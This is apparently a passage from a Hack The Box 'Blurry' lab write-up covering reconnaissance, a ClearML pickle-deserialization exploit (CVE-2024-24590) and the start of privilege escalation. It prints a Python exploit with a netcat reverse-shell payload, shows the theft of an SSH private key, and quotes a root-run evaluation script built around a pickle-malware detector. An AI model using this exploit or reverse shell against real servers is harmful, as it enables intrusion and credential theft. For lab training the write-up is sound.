&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Enumerated open TCP ports:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>nmap -p22,80 -vv --min-rate &lt;span style="color:#d3869b">5000&lt;/span> -sC -sV -oA nmap/service 10.10.11.19
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>Nmap scan report &lt;span style="color:#fe8019">for&lt;/span> app.blurry.htb &lt;span style="color:#fe8019">(&lt;/span>10.10.11.19&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up, received syn-ack &lt;span style="color:#fe8019">(&lt;/span>0.30s latency&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Scanned at 2024-10-13 13:03:02 IST &lt;span style="color:#fe8019">for&lt;/span> 16s
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE REASON VERSION
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>22/tcp open ssh syn-ack OpenSSH 8.4p1 Debian 5+deb11u3 &lt;span style="color:#fe8019">(&lt;/span>protocol 2.0&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>80/tcp open http syn-ack nginx 1.18.0
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-favicon: Unknown favicon MD5: 2CBD65DC962D5BF762BCB815CBD5EFCC
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| http-methods:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_ Supported Methods: GET HEAD
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-server-header: nginx/1.18.0
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-title: ClearML
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>There are only 2 ports open, &lt;code>80&lt;/code> and &lt;code>22&lt;/code>&lt;/p>
&lt;hr>
&lt;h1 id="enumeration">Enumeration&lt;/h1>
&lt;h2 id="port-80---http-nginx-1180">Port 80 - HTTP (Nginx 1.18.0)&lt;/h2>
&lt;p>&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013125133.webp" alt="">
Let&amp;rsquo;s add &lt;code>app.blurry.htb&lt;/code> to &lt;code>/etc/hosts&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fabd2f">echo&lt;/span> -e &lt;span style="color:#b8bb26">&amp;#39;10.10.11.19\tapp.blurry.htb&amp;#39;&lt;/span> | sudo tee -a /etc/hosts
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013125112.webp" alt="">
I then checked if there are any other subdomains present.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>ffuf -u http://10.10.11.19/ -H &lt;span style="color:#b8bb26">&amp;#39;Host: FUZZ.blurry.htb&amp;#39;&lt;/span> -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs &lt;span style="color:#d3869b">169&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013133408.webp" alt="">&lt;h4 id="filesblurryhtb">&lt;code>files.blurry.htb&lt;/code>&lt;/h4>
&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013133519.webp" alt="">&lt;h4 id="chatblurryhtb">&lt;code>chat.blurry.htb&lt;/code>&lt;/h4>
&lt;p>&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013133600.webp" alt="">
We can create a new account and see all the chats:
&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013133903.webp" alt="">
And there&amp;rsquo;s this information in the announcement channel, this might come in handy later.
&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013134129.webp" alt="">&lt;/p>
&lt;h4 id="appblurryhtb">&lt;code>app.blurry.htb&lt;/code>&lt;/h4>
&lt;p>This runs a ClearML server which is an open source MLOps platform.
&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013125332.webp" alt="">
Create a new account and view the dashboard
&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013125823.webp" alt="">
After looking at some of the requests, found the ClearML version used in this application
&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013130137.webp" alt="">
This version is vulnerable to RCE.&lt;/p>
&lt;hr>
&lt;h1 id="exploitation">Exploitation&lt;/h1>
&lt;h2 id="cve-2024-24590---clearml-pickle-artifact-upload-rce">CVE-2024-24590 - ClearML Pickle Artifact Upload RCE&lt;/h2>
&lt;blockquote>
&lt;p>An attacker can execute arbitrary code on an end user&amp;rsquo;s system by uploading a malicious pickle file as an artifact that triggers the deserialization flaw when a user calls the &lt;code>get&lt;/code> method within the &lt;code>Artifact&lt;/code> class to download and load a file into memory.&lt;/p>
&lt;/blockquote>
&lt;p>The research team from &lt;a href="https://hiddenlayer.com">HiddenLayer&lt;/a> found 6 zero-days, including this exploit in both, in the open-source and enterprise versions of ClearML. You can find information about all the other vulnerabilities in their &lt;a href="https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/">blog&lt;/a>.&lt;/p>
&lt;p>In python the pickle module is often used to store machine learning models for training, evaluation, and sharing. However, pickle is an inherently insecure module because it executes arbitrary commands when deserialized.
If there are no proper validation checks, and user created pickle files are deserialized, it can lead to remote code execution vulnerabilities. You can learn more about pickle and insecure deserialization vulnerabilites in these articles:&lt;/p>
&lt;ul>
&lt;li>&lt;a href="https://www.hackingarticles.in/python-serialization-vulnerabilities-pickle/">Python Serialization Vulnerabilities – Pickle&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://intoli.com/blog/dangerous-pickles/">Dangerous Pickles — Malicious Python Serialization&lt;/a>&lt;/li>
&lt;/ul>
&lt;p>The vulnerability was inside the &lt;code>Artifact.get&lt;/code> method, where the application directly loads the pickle object into memory without any checks. They &lt;a href="https://github.com/allegroai/clearml/commit/e506831599bd8e072e5e54266abfccdfbe4be2ac#diff-dd2d5e773ee93fa198f108f03f3f0b8ed272d858cde70a01d41680327da3f133">fixed&lt;/a> the vulnerability by adding an additional hash validation with the hash value of the local file and the uploaded artifact:
&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013142251.webp" alt="">&lt;/p>
&lt;p>To exploit this vulnerability, we first need to upload a malicious artifact file to the ClearML server. If any user happens to download and load the artifact into memory using the &lt;code>Artifact.get&lt;/code> method, we can gain a reverse shell in the server as that user. From the RocketChat instance, we now know that the admin is periodically running an automated task to review all the artifacts with a &lt;code>review&lt;/code> tag inside the &lt;code>Black Swan&lt;/code> project.
Thus, we onle need to upload the artifact to the &lt;code>Black Swan&lt;/code> project with a &lt;code>review&lt;/code> tag and the admin will download it and run it, allowing us to obtain a reverse shell.&lt;/p>
&lt;p>To exploit this we need to install the &lt;code>clearml&lt;/code> pip package:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>pip install clearml
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Then in the server, go to settings -&amp;gt; workspace and create new credentials.
&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013143231.webp" alt="">
Now add the configurations by running the &lt;code>clearml-init&lt;/code> command, which is installed when you install the &lt;code>clearml&lt;/code> pip package.
&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013144502.webp" alt="">
Don&amp;rsquo;t forget to add &lt;code>api.blurry.htb&lt;/code> to your &lt;code>/etc/hosts&lt;/code> file as well.&lt;/p>
&lt;div
class="alert alert-note collapsed"
style="border-color: #076678;"
>
&lt;div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
&lt;i
class="bx bx-info-circle"
style="color: #076678;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #076678"
>
Note
&lt;/p>
&lt;i
class='bx bx-chevron-down collapsed'
style="color: #076678;"
>&lt;/i>
&lt;/div>
&lt;div class="alert-content" style="display: none;">
&lt;p>If you are getting this error:
&lt;code>AttributeError: module 'lib' has no attribute 'OpenSSL_add_all_algorithms'&lt;/code>&lt;/p>
&lt;ul>
&lt;li>Upgrade &lt;code>cryptography&lt;/code>, &lt;code>pyOpenSSL&lt;/code>, and &lt;code>OpenSSL&lt;/code>:&lt;/li>
&lt;/ul>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>pip install --upgrade cryptography pyOpenSSL
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;ul>
&lt;li>Reinstall &lt;code>clearml&lt;/code>&lt;/li>
&lt;/ul>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>pip install --upgrade clearml
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>If this fixes the issue then run &lt;code>clearml-init&lt;/code> to add the configurations again.&lt;/p>
&lt;/div>
&lt;/div>
&lt;script>
function toggleAlert(headerElement) {
var alertBox = headerElement.parentElement;
var alertContent = alertBox.querySelector('.alert-content');
var icon = headerElement.querySelectorAll('i')[1];
alertBox.classList.toggle('open');
alertBox.classList.toggle('collapsed');
if (alertBox.classList.contains('open')) {
alertContent.style.display = 'block';
icon.classList.remove('open');
icon.classList.add('collapsed');
} else {
icon.classList.remove('collapsed');
icon.classList.add('open');
alertContent.style.display = 'none';
}
}
&lt;/script>
&lt;p>Now let&amp;rsquo;s create an exploit to upload our artifact to the server:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-python" data-lang="python">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">from&lt;/span> clearml &lt;span style="color:#fe8019">import&lt;/span> Task
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> pickle&lt;span style="color:#fe8019">,&lt;/span> os
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">class&lt;/span> RunCommand:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">__reduce__&lt;/span>(self):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ip &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&lt;/span> &lt;span style="color:#928374;font-style:italic"># Enter your ip address&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> port &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&lt;/span> &lt;span style="color:#928374;font-style:italic"># Enter listening port&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> command &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">f&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2&amp;gt;&amp;amp;1|nc &lt;/span>&lt;span style="color:#b8bb26">{&lt;/span>ip&lt;span style="color:#b8bb26">}&lt;/span>&lt;span style="color:#b8bb26"> &lt;/span>&lt;span style="color:#b8bb26">{&lt;/span>port&lt;span style="color:#b8bb26">}&lt;/span>&lt;span style="color:#b8bb26"> &amp;gt;/tmp/f&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> (os&lt;span style="color:#fe8019">.&lt;/span>system, (command,))
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">main&lt;/span>():
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> command &lt;span style="color:#fe8019">=&lt;/span> RunCommand()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> task &lt;span style="color:#fe8019">=&lt;/span> Task&lt;span style="color:#fe8019">.&lt;/span>init(project_name&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;Black Swan&amp;#34;&lt;/span>, tags&lt;span style="color:#fe8019">=&lt;/span>[&lt;span style="color:#b8bb26">&amp;#39;review&amp;#39;&lt;/span>], task_name&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;exploit&amp;#39;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> task&lt;span style="color:#fe8019">.&lt;/span>upload_artifact(name&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#39;pickle_artifact&amp;#39;&lt;/span>, artifact_object&lt;span style="color:#fe8019">=&lt;/span>command, retries&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#d3869b">2&lt;/span>, wait_on_upload&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#fe8019">True&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> __name__ &lt;span style="color:#fe8019">==&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;__main__&amp;#34;&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> main()
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>And now start a netcat listener:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>nc -lnvp &lt;span style="color:#d3869b">1234&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>then run the exploit:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>python3 exploit.py
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>wait for the task to run
&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013150806.webp" alt="">
let&amp;rsquo;s copy &lt;code>.ssh/id_rsa&lt;/code> file to login using ssh.
&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013150951.webp" alt="">&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>chmod &lt;span style="color:#d3869b">600&lt;/span> id_rsa
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>ssh jippity@10.10.11.19 -i id_rsa
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013151228.webp" alt="">&lt;hr>
&lt;h1 id="privilege-escalation">Privilege Escalation&lt;/h1>
&lt;h2 id="local-enumeration">Local Enumeration&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013151347.webp" alt="">&lt;p>There are only 2 users in this machine. The user jippity can run &lt;code>/usr/bin/evaluate_model&lt;/code> as root.
&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013151435.webp" alt="">
which is a bash script:
&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013151728.webp" alt="">&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#8ec07c">#!/bin/bash
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#8ec07c">&lt;/span>&lt;span style="color:#928374;font-style:italic"># Evaluate a given model against our proprietary dataset.&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Security checks against model file included.&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> &lt;span style="color:#fe8019">[&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$#&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> -ne &lt;span style="color:#d3869b">1&lt;/span> &lt;span style="color:#fe8019">]&lt;/span>; &lt;span style="color:#fe8019">then&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> /usr/bin/echo &lt;span style="color:#b8bb26">&amp;#34;Usage: &lt;/span>$0&lt;span style="color:#b8bb26"> &amp;lt;path_to_model.pth&amp;gt;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">exit&lt;/span> &lt;span style="color:#d3869b">1&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">fi&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>MODEL_FILE&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$1&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>TEMP_DIR&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;/opt/temp&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PYTHON_SCRIPT&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;/models/evaluate_model.py&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>/usr/bin/mkdir -p &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$TEMP_DIR&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>file_type&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#fe8019">$(&lt;/span>/usr/bin/file --brief &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$MODEL_FILE&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Extract based on file type&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> &lt;span style="color:#fe8019">[[&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$file_type&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> &lt;span style="color:#fe8019">==&lt;/span> *&lt;span style="color:#b8bb26">&amp;#34;POSIX tar archive&amp;#34;&lt;/span>* &lt;span style="color:#fe8019">]]&lt;/span>; &lt;span style="color:#fe8019">then&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#928374;font-style:italic"># POSIX tar archive (older PyTorch format)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> /usr/bin/tar -xf &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$MODEL_FILE&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> -C &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$TEMP_DIR&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">elif&lt;/span> &lt;span style="color:#fe8019">[[&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$file_type&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> &lt;span style="color:#fe8019">==&lt;/span> *&lt;span style="color:#b8bb26">&amp;#34;Zip archive data&amp;#34;&lt;/span>* &lt;span style="color:#fe8019">]]&lt;/span>; &lt;span style="color:#fe8019">then&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#928374;font-style:italic"># Zip archive (newer PyTorch format)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> /usr/bin/unzip -q &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$MODEL_FILE&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> -d &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$TEMP_DIR&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">else&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> /usr/bin/echo &lt;span style="color:#b8bb26">&amp;#34;[!] Unknown or unsupported file format for &lt;/span>$MODEL_FILE&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">exit&lt;/span> &lt;span style="color:#d3869b">2&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">fi&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>/usr/bin/find &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$TEMP_DIR&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> -type f &lt;span style="color:#b8bb26">\(&lt;/span> -name &lt;span style="color:#b8bb26">&amp;#34;*.pkl&amp;#34;&lt;/span> -o -name &lt;span style="color:#b8bb26">&amp;#34;pickle&amp;#34;&lt;/span> &lt;span style="color:#b8bb26">\)&lt;/span> -print0 | &lt;span style="color:#fe8019">while&lt;/span> IFS&lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#fabd2f">read&lt;/span> -r -d &lt;span style="color:#b8bb26">$&amp;#39;\0&amp;#39;&lt;/span> extracted_pkl; &lt;span style="color:#fe8019">do&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> fickling_output&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#fe8019">$(&lt;/span>/usr/local/bin/fickling -s --json-output /dev/fd/1 &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$extracted_pkl&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> /usr/bin/echo &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$fickling_output&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> | /usr/bin/jq -e &lt;span style="color:#b8bb26">&amp;#39;select(.severity == &amp;#34;OVERTLY_MALICIOUS&amp;#34;)&amp;#39;&lt;/span> &amp;gt;/dev/null; &lt;span style="color:#fe8019">then&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> /usr/bin/echo &lt;span style="color:#b8bb26">&amp;#34;[!] Model &lt;/span>$MODEL_FILE&lt;span style="color:#b8bb26"> contains OVERTLY_MALICIOUS components and will be deleted.&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> /bin/rm &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$MODEL_FILE&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">break&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">fi&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">done&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>/usr/bin/find &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$TEMP_DIR&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> -type f -exec /bin/rm &lt;span style="color:#fe8019">{}&lt;/span> +
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>/bin/rm -rf &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$TEMP_DIR&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> &lt;span style="color:#fe8019">[&lt;/span> -f &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$MODEL_FILE&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> &lt;span style="color:#fe8019">]&lt;/span>; &lt;span style="color:#fe8019">then&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> /usr/bin/echo &lt;span style="color:#b8bb26">&amp;#34;[+] Model &lt;/span>$MODEL_FILE&lt;span style="color:#b8bb26"> is considered safe. Processing...&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> /usr/bin/python3 &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$PYTHON_SCRIPT&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$MODEL_FILE&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">fi&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>The file requires one argument, which is the location of the model file. The model file should be in either &lt;code>tar&lt;/code> or &lt;code>zip&lt;/code> format.
It then extracts the archive in &lt;code>/opt/temp&lt;/code>. It then uses a static code analyzer called &lt;code>fickling&lt;/code> to check if any of the serialized pickle files extracted in &lt;code>/opt/temp&lt;/code> is malicious.
If everything is fine, it finally runs &lt;code>/models/evaluate_models.py&lt;/code> script with the model file as its argument.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-python" data-lang="python">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> torch
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> torch.nn &lt;span style="color:#fe8019">as&lt;/span> nn
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">from&lt;/span> torchvision &lt;span style="color:#fe8019">import&lt;/span> transforms
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">from&lt;/span> torchvision.datasets &lt;span style="color:#fe8019">import&lt;/span> CIFAR10
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">from&lt;/span> torch.utils.data &lt;span style="color:#fe8019">import&lt;/span> DataLoader, Subset
